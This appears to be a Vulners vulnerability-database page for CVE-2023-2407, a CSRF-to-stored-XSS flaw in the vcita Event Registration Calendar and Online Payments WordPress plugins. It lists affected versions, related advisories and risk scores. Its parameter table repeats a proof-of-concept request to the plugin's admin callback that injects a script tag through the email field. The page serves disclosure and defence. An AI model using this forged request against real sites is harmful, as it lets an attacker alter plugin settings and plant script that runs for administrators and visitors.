Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2023-2407 | 3 Jun 202305:15 | – | attackerkb |
 | WordPress plugin Event Registration Calendar By vcita 跨站请求伪造漏洞 | 3 Jun 202300:00 | – | cnnvd |
 | CVE-2023-2407 Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.10.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting | 3 Jun 202304:35 | – | cvelist |
 | EUVD-2023-33897 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-2407 | 3 Jun 202305:15 | – | nvd |
 | CVE-2023-2407 | 3 Jun 202305:15 | – | osv |
 | Cross site request forgery (csrf) | 3 Jun 202305:15 | – | prion |
 | PT-2023-19387 · Vcita · The Event Registration Calendar By Vcita | 3 Jun 202300:00 | – | ptsecurity |
 | CVE-2023-2407 | 23 May 202501:48 | – | redhatcve |
 | CVE-2023-2407 Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.10.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting | 3 Jun 202304:35 | – | vulnrichment |
10
Node
OR
[
{
"vendor": "vcita",
"product": "Event Registration Calendar By vcita",
"versions": [
{
"version": "0",
"status": "affected",
"lessThanOrEqual": "1.3.1",
"versionType": "semver"
}
],
"defaultStatus": "unaffected"
},
{
"vendor": "vcita",
"product": "Online Payments – Get Paid with PayPal, Square & Stripe",
"versions": [
{
"version": "0",
"status": "affected",
"lessThanOrEqual": "3.10.0",
"versionType": "semver"
}
],
"defaultStatus": "unaffected"
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| success | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| uid | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| first_name | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| last_name | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| title | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| confirmation_token | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| confirmed | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| engage_delay | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| implementation_key | query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
| query param | wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script> | CSRF vulnerability allowing unauthenticated attackers to modify plugin settings via a forged request. | CWE-352 |
10
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2026 17:16Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.16.1 - 6.5
EPSS0.00111
SSVC